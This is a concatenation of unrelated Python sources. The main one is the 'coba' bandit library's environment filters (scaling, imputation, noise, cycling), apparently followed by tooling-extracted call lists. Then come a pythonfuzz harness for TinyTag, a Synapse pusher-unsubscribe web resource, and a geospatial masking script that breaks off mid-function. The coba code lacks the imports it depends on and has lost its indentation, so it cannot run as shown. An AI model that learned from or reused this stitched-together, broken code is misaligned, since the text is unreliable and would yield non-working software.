from typing import Hashable, Optional, Sequence, Union, Iterable, Dict, Any, List, Tuple, Callable, Mapping
from coba.backports import Literal
from coba import pipes
from coba.random import CobaRandom
from coba.exceptions import CobaException
from coba.statistics import iqr
from coba.pipes import Flatten
from coba.environments.primitives import Interaction
from coba.environments.logged.primitives import LoggedInteraction
from coba.environments.simulated.primitives import SimulatedInteraction
class EnvironmentFilter(pipes.Filter[Iterable[Interaction],Iterable[Interaction]], ABC):
"""A filter that can be applied to an Environment."""
@abstractmethod
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
"""Apply a filter to an Environment's interactions."""
...
class Identity(pipes.Identity, EnvironmentFilter):
"""Return whatever interactions are given to the filter."""
pass
class Take(pipes.Take, EnvironmentFilter):
"""Take a fixed number of interactions from an Environment."""
pass
class Shuffle(pipes.Shuffle, EnvironmentFilter):
"""Shuffle a sequence of Interactions in an Environment."""
pass
class Reservoir(pipes.Reservoir, EnvironmentFilter):
"""Take a fixed number of random Interactions from an Environment."""
pass
class Scale(EnvironmentFilter):
"""Shift and scale features to precondition them before learning."""
def __init__(self,
shift: Union[Number,Literal["min","mean","med"]] = 0,
scale: Union[Number,Literal["minmax","std","iqr","maxabs"]] = "minmax",
target: Literal["features","rewards"] = "features",
using: Optional[int] = None):
"""Instantiate a Scale filter.
Args:
shift: The statistic to use to shift each context feature.
scale: The statistic to use to scale each context feature.
target: The target data we wish to scale in the environment.
using: The number of interactions to use when calculating the necessary statistics.
"""
assert isinstance(shift,Number) or shift in ["min","mean","med"]
assert isinstance(scale,Number) or scale in ["minmax","std","iqr","maxabs"]
self._shift = shift
self._scale = scale
self._using = using
self._target = target
@property
def params(self) -> Dict[str, Any]:
return {
"scale_shift": self._shift,
"scale_scale": self._scale,
"scale_using": self._using,
"scale_target": self._target
}
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
iter_interactions = iter(interactions)
fitting_interactions = list(islice(iter_interactions,self._using))
shifts : Dict[Hashable,float] = defaultdict(lambda:0)
scales : Dict[Hashable,float] = defaultdict(lambda:1)
unscaled: Dict[Hashable,List[Any]] = defaultdict(list)
if any([isinstance(i.context,dict) for i in fitting_interactions]) and self._shift != 0:
raise CobaException("Shift is required to be 0 for sparse environments. Otherwise the environment will become dense.")
mixed = set()
had_non_numeric = set()
for interaction in fitting_interactions:
if self._target == "features":
for name,value in self._feature_pairs(interaction.context):
if name in mixed: continue
is_numeric = isinstance(value,Number)
is_nan = is_numeric and isnan(value)
if is_nan:
pass
elif (not is_numeric and name in unscaled) or (is_numeric and name in had_non_numeric):
mixed.add(name)
if name in unscaled: del unscaled[name]
if name in had_non_numeric: had_non_numeric.remove(name)
elif not is_numeric:
had_non_numeric.add(name)
elif is_numeric and not is_nan:
unscaled[name].append(value)
if self._target == "rewards":
unscaled["rewards"].extend(interaction.rewards)
if mixed: warnings.warn(f"Some features were not scaled due to having mixed types: {mixed}. ")
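        # in sparse (dict) contexts a missing key is an implicit 0, so record an
        # explicit 0 for those features before computing the shift/scale statistics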
has_sparse_zero = set()
for interaction in fitting_interactions:
if isinstance(interaction.context,dict):
has_sparse_zero |= unscaled.keys() - interaction.context.keys() - {"rewards"}
for key in has_sparse_zero:
unscaled[key].append(0)
for name, values in unscaled.items():
if isinstance(self._shift, Number):
shift = self._shift
if self._shift == "min":
shift = min(values)
if self._shift == "mean":
shift = mean(values)
if self._shift == "med":
shift = median(values)
if isinstance(self._scale, Number):
scale_num = self._scale
scale_den = 1
if self._scale == "std":
scale_num = 1
scale_den = stdev(values)
if self._scale == "minmax":
scale_num = 1
scale_den = max(values)-min(values)
if self._scale == "iqr":
scale_num = 1
scale_den = iqr(values)
if self._scale == "maxabs":
scale_num = 1
scale_den = max([abs(v-shift) for v in values])
shifts[name] = shift
scales[name] = scale_num/scale_den if round(scale_den,10) != 0 else 1
for interaction in chain(fitting_interactions, iter_interactions):
scaled_values = {}
final_context = interaction.context
final_rewards = None
final_kwargs = interaction.kwargs.copy()
if self._target == "features":
for name,value in self._feature_pairs(interaction.context):
if isinstance(value,Number):
scaled_values[name] = (value-shifts[name])*scales[name]
else:
scaled_values[name] = value
if interaction.context is None:
final_context = None
elif isinstance(interaction.context,dict):
final_context = scaled_values
elif isinstance(interaction.context,tuple):
final_context = tuple(scaled_values[k] for k,_ in self._feature_pairs(interaction.context))
else:
final_context = scaled_values[1]
if self._target == "rewards":
final_rewards = [ (r-shifts['rewards'])*scales['rewards'] for r in interaction.rewards ]
if isinstance(interaction, SimulatedInteraction):
yield SimulatedInteraction(
final_context,
interaction.actions,
final_rewards or interaction.rewards,
**interaction.kwargs
)
elif isinstance(interaction, LoggedInteraction):
yield LoggedInteraction(
final_context,
interaction.action,
interaction.reward,
interaction.probability,
interaction.actions,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Scale.")
def _feature_pairs(self,context) -> Sequence[Tuple[Hashable,Any]]:
if isinstance(context,dict ): return context.items()
if isinstance(context,tuple): return enumerate(context)
if context is not None : return [(1,context)]
return []
class Impute(EnvironmentFilter):
"""Impute missing values (nan) in Interaction contexts."""
def __init__(self,
stat : Literal["mean","median","mode"] = "mean",
using: Optional[int] = None):
"""Instantiate an Impute filter.
Args:
            stat: The statistic to use for imputation.
using: The number of interactions to use to calculate the imputation statistics.
"""
assert stat in ["mean","median","mode"]
self._stat = stat
self._using = using
@property
def params(self) -> Dict[str, Any]:
return { "impute_stat": self._stat, "impute_using": self._using }
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
iter_interactions = iter(interactions)
train_interactions = list(islice(iter_interactions,self._using))
test_interactions = chain.from_iterable([train_interactions, iter_interactions])
stats : Dict[Hashable,float] = defaultdict(int)
features: Dict[Hashable,List[Number]] = defaultdict(list)
for interaction in train_interactions:
for name,value in self._context_as_name_values(interaction.context):
if isinstance(value,Number) and not isnan(value):
features[name].append(value)
for feat_name, feat_numeric_values in features.items():
if self._stat == "mean":
stats[feat_name] = mean(feat_numeric_values)
if self._stat == "median":
stats[feat_name] = median(feat_numeric_values)
if self._stat == "mode":
stats[feat_name] = mode(feat_numeric_values)
for interaction in test_interactions:
kv_imputed_context = {}
for name,value in self._context_as_name_values(interaction.context):
kv_imputed_context[name] = stats[name] if isinstance(value,Number) and isnan(value) else value
if interaction.context is None:
final_context = None
elif isinstance(interaction.context,dict):
final_context = kv_imputed_context
elif isinstance(interaction.context,tuple):
final_context = tuple(kv_imputed_context[k] for k,_ in self._context_as_name_values(interaction.context))
else:
final_context = kv_imputed_context[1]
if isinstance(interaction, SimulatedInteraction):
yield SimulatedInteraction(
final_context,
interaction.actions,
interaction.rewards,
**interaction.kwargs
)
elif isinstance(interaction, LoggedInteraction):
yield LoggedInteraction(
final_context,
interaction.action,
interaction.reward,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Impute.")
def _context_as_name_values(self,context) -> Sequence[Tuple[Hashable,Any]]:
if isinstance(context,dict ): return context.items()
if isinstance(context,tuple): return enumerate(context)
if context is not None : return [(1,context)]
return []
class Sparse(EnvironmentFilter):
"""Sparsify an environment's feature representation.
This has little utility beyond debugging.
"""
def __init__(self, context:bool = True, action:bool = False):
"""Instantiate a Sparse filter.
Args:
context: If True then contexts should be made sparse otherwise leave them alone.
action: If True then actions should be made sparse otherwise leave them alone.
"""
self._context = context
self._action = action
@property
def params(self) -> Dict[str, Any]:
return { "sparse_C": self._context, "sparse_A": self._action }
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
for interaction in interactions:
sparse_context = self._make_sparse(interaction.context) if self._context else interaction.context
if isinstance(interaction, SimulatedInteraction):
sparse_actions = list(map(self._make_sparse,interaction.actions)) if self._action else interaction.actions
yield SimulatedInteraction(
sparse_context,
sparse_actions,
interaction.rewards
)
elif isinstance(interaction, LoggedInteraction):
sparse_action = self._make_sparse(interaction.action) if self._action else interaction.action
yield LoggedInteraction(
sparse_context,
sparse_action,
interaction.reward,
interaction.probability,
interaction.actions,
**interaction.kwargs
)
else: #pragma: no cover
raise CobaException("Unknown interactions were given to Sparse.")
def _make_sparse(self, value) -> Optional[dict]:
if isinstance(value,dict) or value is None:
return value
if isinstance(value,(list,tuple)):
return dict(enumerate(value))
return {0:value}
class Cycle(EnvironmentFilter):
"""Cycle all rewards associated with actions by one place.
    This filter is useful for testing an algorithm's response to a non-stationary shock.
"""
def __init__(self, after:int = 0):
"""Instantiate a Cycle filter.
Args:
after: How many interactions should be seen before applying the cycle filter.
"""
self._after = after
@property
def params(self) -> Dict[str, Any]:
return { "cycle_after": self._after }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
underlying_iterable = iter(interactions)
sans_cycle_interactions = islice(underlying_iterable, self._after)
with_cycle_interactions = underlying_iterable
for interaction in sans_cycle_interactions:
yield interaction
try:
first_interaction = next(with_cycle_interactions)
action_set = set(first_interaction.actions)
n_actions = len(action_set)
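            # cycling rewards is only meaningful when actions are plain one-hot
            # placeholders; build the expected one-hot tuples to verify that below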
featureless_actions = [tuple([0]*n+[1]+[0]*(n_actions-n-1)) for n in range(n_actions)]
with_cycle_interactions = chain([first_interaction], with_cycle_interactions)
if len(set(action_set) & set(featureless_actions)) != len(action_set):
warnings.warn("Cycle only works for environments without action features. It will be ignored in this case.")
for interaction in with_cycle_interactions:
yield interaction
else:
for interaction in with_cycle_interactions:
rewards = interaction.rewards[-1:] + interaction.rewards[:-1]
yield SimulatedInteraction(interaction.context, interaction.actions, rewards, **interaction.kwargs)
except StopIteration:
pass
class Binary(EnvironmentFilter):
"""Binarize all rewards to either 1 (max rewards) or 0 (all others)."""
@property
def params(self) -> Dict[str, Any]:
return { "binary": True }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
for interaction in interactions:
max_rwd = max(interaction.rewards)
rewards = [int(r==max_rwd) for r in interaction.rewards]
yield SimulatedInteraction(interaction.context, interaction.actions, rewards, **interaction.kwargs)
class Sort(EnvironmentFilter):
"""Sort a sequence of Interactions in an Environment."""
def __init__(self, *keys: Union[str,int,Sequence[Union[str,int]]]) -> None:
"""Instantiate a Sort filter.
Args:
*keys: The context items that should be sorted on.
"""
self._keys = list(Flatten().filter([list(keys)]))[0]
@property
def params(self) -> Dict[str, Any]:
return { "sort": self._keys or '*' }
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
full_sorter = lambda interaction: tuple(interaction.context )
list_sorter = lambda interaction: tuple(interaction.context[key] for key in self._keys)
dict_sorter = lambda interaction: tuple(interaction.context.get(key,0) for key in self._keys)
interactions = list(interactions)
is_sparse = isinstance(interactions[0].context,dict)
sorter = full_sorter if not self._keys else dict_sorter if is_sparse else list_sorter
return sorted(interactions, key=sorter)
class Where(EnvironmentFilter):
"""Define Environment selection criteria for an Environments pipe."""
def __init__(self, *, n_interactions: Union[int,Tuple[Optional[int],Optional[int]]] = None) -> None:
"""Instantiate a Where filter.
Args:
n_interactions: The minimum, maximum or exact number of interactions Environments must have.
"""
self._n_interactions = n_interactions
@property
def params(self) -> Dict[str, Any]:
params = {}
if self._n_interactions is not None:
params["where_n_interactions"] = self._n_interactions
return params
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
interactions = iter(interactions)
if self._n_interactions is None or self._n_interactions == (None,None):
min_interactions = None
max_interactions = None
take_interactions = 0
elif isinstance(self._n_interactions, int):
min_interactions = self._n_interactions
max_interactions = self._n_interactions
take_interactions = self._n_interactions+1
else:
min_interactions = self._n_interactions[0]
max_interactions = self._n_interactions[1]
take_interactions = max(filter(lambda x: x is not None, list(self._n_interactions)))+1
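        # take one interaction beyond the largest bound so that exceeding the
        # maximum can be detected from the length of the taken list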
taken_interactions = list(islice(interactions, take_interactions))
if max_interactions is not None and len(taken_interactions) > max_interactions:
return []
if min_interactions is not None and len(taken_interactions) < min_interactions:
return []
return chain(taken_interactions, interactions)
class Warm(EnvironmentFilter):
"""Turn a SimulatedEnvironment into a WarmStartEnvironment."""
def __init__(self, n_warm:int, seed:int = 1):
"""Instantiate a Warm filter.
Args:
n_warm: The number of interactions that should be turned into LoggedInteractions.
seed: The random number seed that determines the random logging policy for LoggedInteractions.
"""
self._n_warm = n_warm
self._seed = seed
@property
def params(self) -> Dict[str, Any]:
return { "n_warm": self._n_warm }
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[Interaction]:
self._rng = CobaRandom(self._seed)
underlying_iterable = iter(interactions)
logged_interactions = map(self._to_logged_interaction, islice(underlying_iterable, self._n_warm))
simulated_interactions = underlying_iterable
return chain(logged_interactions, simulated_interactions)
def _to_logged_interaction(self, interaction: SimulatedInteraction) -> LoggedInteraction:
num_actions = len(interaction.actions)
probabilities = [1/num_actions] * num_actions
idx = self._rng.choice(list(range(num_actions)), probabilities)
actions = interaction.actions
action = interaction.actions[idx]
prob = probabilities[idx]
reward = interaction.rewards[idx]
return LoggedInteraction(interaction.context, action, reward, prob, actions)
class Riffle(EnvironmentFilter):
"""Riffle shuffle Interactions by taking actions from the end and evenly distributing into the beginning."""
def __init__(self, spacing: int = 3, seed=1) -> None:
"""Instantiate a Riffle filter.
Args:
spacing: The number of interactions from the beginning between each interaction shuffled in from the end.
seed: The seed used to determine the location of each ending interaction when placed within its beginning space.
"""
self._spacing = spacing
self._seed = seed
@property
def params(self) -> Dict[str, Any]:
return {"riffle_spacing": self._spacing, "riffle_seed": self._seed}
def filter(self, interactions: Iterable[Interaction]) -> Iterable[Interaction]:
rng = CobaRandom(self._seed)
interactions = list(interactions)
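        # walk the start of the list in windows of `spacing` interactions and drop
        # the current last interaction into a random position inside each window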
for i in range(int(len(interactions)/(self._spacing+1))):
interactions.insert(i*self._spacing+rng.randint(0,self._spacing), interactions.pop())
return interactions
class Noise(EnvironmentFilter):
"""Introduce noise to an environment."""
def __init__(self,
context: Callable[[float,CobaRandom], float] = None,
action : Callable[[float,CobaRandom], float] = None,
reward : Callable[[float,CobaRandom], float] = None,
seed : int = 1) -> None:
"""Instantiate a Noise EnvironmentFilter.
Args:
context: A noise generator for context features.
action : A noise generator for action features.
reward : A noise generator for rewards.
seed : The seed initializing the random state of the noise generators.
"""
self._args = (context,action,reward,seed)
self._no_noise = lambda x, _: x
if context is None and action is None and reward is None:
context = lambda x, rng: x+rng.gauss(0,1)
self._context_noise = context or self._no_noise
self._action_noise = action or self._no_noise
self._reward_noise = reward or self._no_noise
self._seed = seed
def __reduce__(self) -> tuple:
try:
pickle.dumps(self._args)
except Exception:
message = (
"We were unable to pickle the Noise filter. This is likely due to using lambda functions for noise generation. "
"To work around this we recommend you first define your lambda functions as a named function and then pass the "
"named function to Noise."
)
raise CobaException(message)
else:
return (Noise, self._args)
@property
def params(self) -> Dict[str, Any]:
params = {}
if self._context_noise != self._no_noise: params['context_noise'] = True
if self._action_noise != self._no_noise : params['action_noise' ] = True
if self._reward_noise != self._no_noise : params['reward_noise' ] = True
params['noise_seed'] = self._seed
return params
def filter(self, interactions: Iterable[SimulatedInteraction]) -> Iterable[SimulatedInteraction]:
rng = CobaRandom(self._seed)
for interaction in interactions:
if isinstance(interaction, LoggedInteraction):
raise CobaException("We do not currently support adding noise to a LoggedInteraction.")
noisy_context = self._noises(interaction.context, rng, self._context_noise)
noisy_actions = [ self._noises(a, rng, self._action_noise) for a in interaction.actions ]
noisy_rewards = [ self._noises(r, rng, self._reward_noise) for r in interaction.rewards ]
yield SimulatedInteraction(noisy_context, noisy_actions, noisy_rewards, **interaction.kwargs)
def _noises(self, value:Union[None,float,str,Mapping,Sequence], rng: CobaRandom, noiser: Callable[[float,CobaRandom], float]):
if isinstance(value, collections.abc.Mapping):
#we sort so that noise generation is deterministic with respect to seed
return { k:self._noise(v, rng, noiser) for k,v in sorted(value.items()) }
if isinstance(value, collections.abc.Sequence) and not isinstance(value, str):
return [ self._noise(v, rng, noiser) for v in value ]
return self._noise(value, rng, noiser)
def _noise(self, value:Union[None,float,str], rng: CobaRandom, noiser: Callable[[float,CobaRandom], float]) -> float:
return value if not isinstance(value,(int,float)) else noiser(value, rng)
| [
"itertools.chain",
"coba.environments.logged.primitives.LoggedInteraction",
"itertools.islice",
"statistics.mean",
"statistics.stdev",
"coba.pipes.Flatten",
"pickle.dumps",
"coba.exceptions.CobaException",
"coba.statistics.iqr",
"statistics.median",
"itertools.chain.from_iterable",
"coba.environments.simulated.primitives.SimulatedInteraction",
"collections.defaultdict",
"statistics.mode",
"coba.random.CobaRandom",
"warnings.warn",
"math.isnan"
]
| [((3136, 3159), 'collections.defaultdict', 'defaultdict', (['(lambda : 0)'], {}), '(lambda : 0)\n', (3147, 3159), False, 'from collections import defaultdict\n'), ((3203, 3226), 'collections.defaultdict', 'defaultdict', (['(lambda : 1)'], {}), '(lambda : 1)\n', (3214, 3226), False, 'from collections import defaultdict\n'), ((3270, 3287), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (3281, 3287), False, 'from collections import defaultdict\n'), ((6070, 6116), 'itertools.chain', 'chain', (['fitting_interactions', 'iter_interactions'], {}), '(fitting_interactions, iter_interactions)\n', (6075, 6116), False, 'from itertools import islice, chain\n'), ((9166, 9226), 'itertools.chain.from_iterable', 'chain.from_iterable', (['[train_interactions, iter_interactions]'], {}), '([train_interactions, iter_interactions])\n', (9185, 9226), False, 'from itertools import islice, chain\n'), ((9276, 9292), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (9287, 9292), False, 'from collections import defaultdict\n'), ((9341, 9358), 'collections.defaultdict', 'defaultdict', (['list'], {}), '(list)\n', (9352, 9358), False, 'from collections import defaultdict\n'), ((14440, 14480), 'itertools.islice', 'islice', (['underlying_iterable', 'self._after'], {}), '(underlying_iterable, self._after)\n', (14446, 14480), False, 'from itertools import islice, chain\n'), ((19036, 19075), 'itertools.chain', 'chain', (['taken_interactions', 'interactions'], {}), '(taken_interactions, interactions)\n', (19041, 19075), False, 'from itertools import islice, chain\n'), ((19760, 19782), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (19770, 19782), False, 'from coba.random import CobaRandom\n'), ((20014, 20064), 'itertools.chain', 'chain', (['logged_interactions', 'simulated_interactions'], {}), '(logged_interactions, simulated_interactions)\n', (20019, 20064), False, 'from itertools import islice, chain\n'), ((20517, 20586), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['interaction.context', 'action', 'reward', 'prob', 'actions'], {}), '(interaction.context, action, reward, prob, actions)\n', (20534, 20586), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((21401, 21423), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (21411, 21423), False, 'from coba.random import CobaRandom\n'), ((23780, 23802), 'coba.random.CobaRandom', 'CobaRandom', (['self._seed'], {}), '(self._seed)\n', (23790, 23802), False, 'from coba.random import CobaRandom\n'), ((3051, 3089), 'itertools.islice', 'islice', (['iter_interactions', 'self._using'], {}), '(iter_interactions, self._using)\n', (3057, 3089), False, 'from itertools import islice, chain\n'), ((3404, 3526), 'coba.exceptions.CobaException', 'CobaException', (['"""Shift is required to be 0 for sparse environments. Otherwise the environment will become dense."""'], {}), "(\n 'Shift is required to be 0 for sparse environments. Otherwise the environment will become dense.'\n )\n", (3417, 3526), False, 'from coba.exceptions import CobaException\n'), ((4584, 4673), 'warnings.warn', 'warnings.warn', (['f"""Some features were not scaled due to having mixed types: {mixed}. """'], {}), "(\n f'Some features were not scaled due to having mixed types: {mixed}. 
')\n", (4597, 4673), False, 'import warnings\n'), ((9098, 9136), 'itertools.islice', 'islice', (['iter_interactions', 'self._using'], {}), '(iter_interactions, self._using)\n', (9104, 9136), False, 'from itertools import islice, chain\n'), ((14959, 15010), 'itertools.chain', 'chain', (['[first_interaction]', 'with_cycle_interactions'], {}), '([first_interaction], with_cycle_interactions)\n', (14964, 15010), False, 'from itertools import islice, chain\n'), ((18757, 18796), 'itertools.islice', 'islice', (['interactions', 'take_interactions'], {}), '(interactions, take_interactions)\n', (18763, 18796), False, 'from itertools import islice, chain\n'), ((19902, 19943), 'itertools.islice', 'islice', (['underlying_iterable', 'self._n_warm'], {}), '(underlying_iterable, self._n_warm)\n', (19908, 19943), False, 'from itertools import islice, chain\n'), ((22792, 22816), 'pickle.dumps', 'pickle.dumps', (['self._args'], {}), '(self._args)\n', (22804, 22816), False, 'import pickle\n'), ((5241, 5253), 'statistics.mean', 'mean', (['values'], {}), '(values)\n', (5245, 5253), False, 'from statistics import mean, median, stdev, mode\n'), ((5316, 5330), 'statistics.median', 'median', (['values'], {}), '(values)\n', (5322, 5330), False, 'from statistics import mean, median, stdev, mode\n'), ((5546, 5559), 'statistics.stdev', 'stdev', (['values'], {}), '(values)\n', (5551, 5559), False, 'from statistics import mean, median, stdev, mode\n'), ((5779, 5790), 'coba.statistics.iqr', 'iqr', (['values'], {}), '(values)\n', (5782, 5790), False, 'from coba.statistics import iqr\n'), ((9741, 9766), 'statistics.mean', 'mean', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9745, 9766), False, 'from statistics import mean, median, stdev, mode\n'), ((9842, 9869), 'statistics.median', 'median', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9848, 9869), False, 'from statistics import mean, median, stdev, mode\n'), ((9943, 9968), 'statistics.mode', 'mode', (['feat_numeric_values'], {}), '(feat_numeric_values)\n', (9947, 9968), False, 'from statistics import mean, median, stdev, mode\n'), ((15111, 15229), 'warnings.warn', 'warnings.warn', (['"""Cycle only works for environments without action features. It will be ignored in this case."""'], {}), "(\n 'Cycle only works for environments without action features. 
It will be ignored in this case.'\n )\n", (15124, 15229), False, 'import warnings\n'), ((16125, 16223), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['interaction.context', 'interaction.actions', 'rewards'], {}), '(interaction.context, interaction.actions, rewards, **\n interaction.kwargs)\n', (16145, 16223), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((23200, 23222), 'coba.exceptions.CobaException', 'CobaException', (['message'], {}), '(message)\n', (23213, 23222), False, 'from coba.exceptions import CobaException\n'), ((23927, 24013), 'coba.exceptions.CobaException', 'CobaException', (['"""We do not currently support adding noise to a LoggedInteraction."""'], {}), "(\n 'We do not currently support adding noise to a LoggedInteraction.')\n", (23940, 24013), False, 'from coba.exceptions import CobaException\n'), ((24321, 24413), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['noisy_context', 'noisy_actions', 'noisy_rewards'], {}), '(noisy_context, noisy_actions, noisy_rewards, **\n interaction.kwargs)\n', (24341, 24413), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((7292, 7412), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['final_context', 'interaction.actions', '(final_rewards or interaction.rewards)'], {}), '(final_context, interaction.actions, final_rewards or\n interaction.rewards, **interaction.kwargs)\n', (7312, 7412), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((7929, 7987), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Scale."""'], {}), "('Unknown interactions were given to Scale.')\n", (7942, 7987), False, 'from coba.exceptions import CobaException\n'), ((10769, 10873), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['final_context', 'interaction.actions', 'interaction.rewards'], {}), '(final_context, interaction.actions, interaction.\n rewards, **interaction.kwargs)\n', (10789, 10873), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((11303, 11362), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Impute."""'], {}), "('Unknown interactions were given to Impute.')\n", (11316, 11362), False, 'from coba.exceptions import CobaException\n'), ((12749, 12822), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['sparse_context', 'sparse_actions', 'interaction.rewards'], {}), '(sparse_context, sparse_actions, interaction.rewards)\n', (12769, 12822), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((13430, 13489), 'coba.exceptions.CobaException', 'CobaException', (['"""Unknown interactions were given to Sparse."""'], {}), "('Unknown interactions were given to Sparse.')\n", (13443, 13489), False, 'from coba.exceptions import CobaException\n'), ((3896, 3908), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (3901, 3908), False, 'from math import isnan\n'), ((7591, 7735), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['final_context', 'interaction.action', 'interaction.reward', 'interaction.probability', 'interaction.actions'], {}), '(final_context, interaction.action, interaction.reward,\n interaction.probability, interaction.actions, **interaction.kwargs)\n', (7608, 
7735), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((9540, 9552), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (9545, 9552), False, 'from math import isnan\n'), ((10222, 10234), 'math.isnan', 'isnan', (['value'], {}), '(value)\n', (10227, 10234), False, 'from math import isnan\n'), ((11051, 11150), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['final_context', 'interaction.action', 'interaction.reward'], {}), '(final_context, interaction.action, interaction.reward, **\n interaction.kwargs)\n', (11068, 11150), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((13096, 13236), 'coba.environments.logged.primitives.LoggedInteraction', 'LoggedInteraction', (['sparse_context', 'sparse_action', 'interaction.reward', 'interaction.probability', 'interaction.actions'], {}), '(sparse_context, sparse_action, interaction.reward,\n interaction.probability, interaction.actions, **interaction.kwargs)\n', (13113, 13236), False, 'from coba.environments.logged.primitives import LoggedInteraction\n'), ((15504, 15602), 'coba.environments.simulated.primitives.SimulatedInteraction', 'SimulatedInteraction', (['interaction.context', 'interaction.actions', 'rewards'], {}), '(interaction.context, interaction.actions, rewards, **\n interaction.kwargs)\n', (15524, 15602), False, 'from coba.environments.simulated.primitives import SimulatedInteraction\n'), ((16548, 16557), 'coba.pipes.Flatten', 'Flatten', ([], {}), '()\n', (16555, 16557), False, 'from coba.pipes import Flatten\n')] |
from pythonfuzz.main import PythonFuzz
from tinytag import TinyTag
import io
@PythonFuzz
def fuzz(buf):
try:
        # write the fuzz input to disk and close the handle so the bytes are
        # flushed before TinyTag re-opens and parses the file by name
        with open('temp.mp4', "wb") as f:
            f.write(buf)
        tag = TinyTag.get('temp.mp4')
except UnicodeDecodeError:
pass
if __name__ == '__main__':
fuzz()
| [
"tinytag.TinyTag.get"
]
| [((175, 194), 'tinytag.TinyTag.get', 'TinyTag.get', (['f.name'], {}), '(f.name)\n', (186, 194), False, 'from tinytag import TinyTag\n')] |
# Copyright 2022 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import TYPE_CHECKING
from synapse.api.errors import StoreError
from synapse.http.server import DirectServeHtmlResource, respond_with_html_bytes
from synapse.http.servlet import parse_string
from synapse.http.site import SynapseRequest
if TYPE_CHECKING:
from synapse.server import HomeServer
class UnsubscribeResource(DirectServeHtmlResource):
"""
    To allow a pusher to be deleted by clicking a link (i.e. a GET request)
"""
SUCCESS_HTML = b"<html><body>You have been unsubscribed</body><html>"
def __init__(self, hs: "HomeServer"):
super().__init__()
self.notifier = hs.get_notifier()
self.auth = hs.get_auth()
self.pusher_pool = hs.get_pusherpool()
self.macaroon_generator = hs.get_macaroon_generator()
async def _async_render_GET(self, request: SynapseRequest) -> None:
token = parse_string(request, "access_token", required=True)
app_id = parse_string(request, "app_id", required=True)
pushkey = parse_string(request, "pushkey", required=True)
user_id = self.macaroon_generator.verify_delete_pusher_token(
token, app_id, pushkey
)
try:
await self.pusher_pool.remove_pusher(
app_id=app_id, pushkey=pushkey, user_id=user_id
)
except StoreError as se:
if se.code != 404:
# This is fine: they're already unsubscribed
raise
self.notifier.on_new_replication_data()
respond_with_html_bytes(
request,
200,
UnsubscribeResource.SUCCESS_HTML,
)
| [
"synapse.http.servlet.parse_string",
"synapse.http.server.respond_with_html_bytes"
]
| [((1465, 1517), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""access_token"""'], {'required': '(True)'}), "(request, 'access_token', required=True)\n", (1477, 1517), False, 'from synapse.http.servlet import parse_string\n'), ((1535, 1581), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""app_id"""'], {'required': '(True)'}), "(request, 'app_id', required=True)\n", (1547, 1581), False, 'from synapse.http.servlet import parse_string\n'), ((1600, 1647), 'synapse.http.servlet.parse_string', 'parse_string', (['request', '"""pushkey"""'], {'required': '(True)'}), "(request, 'pushkey', required=True)\n", (1612, 1647), False, 'from synapse.http.servlet import parse_string\n'), ((2111, 2182), 'synapse.http.server.respond_with_html_bytes', 'respond_with_html_bytes', (['request', '(200)', 'UnsubscribeResource.SUCCESS_HTML'], {}), '(request, 200, UnsubscribeResource.SUCCESS_HTML)\n', (2134, 2182), False, 'from synapse.http.server import DirectServeHtmlResource, respond_with_html_bytes\n')] |
# ******************************************************
## Copyright 2019, PBL Netherlands Environmental Assessment Agency and Utrecht University.
## Reuse permitted under Gnu Public License, GPL v3.
# ******************************************************
from netCDF4 import Dataset
import numpy as np
import general_path
import accuflux
import ascraster
import get_surrounding_cells
import make_np_grid
def do(mask_asc_fn, mask_id, dum_asc, logical = "EQ", mask_type='np_grid'):
dum_mask = ascraster.create_mask(mask_asc_fn, mask_id, logical = logical, numtype=int)
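    # dum_mask holds the flat indices of the grid cells that satisfy the mask
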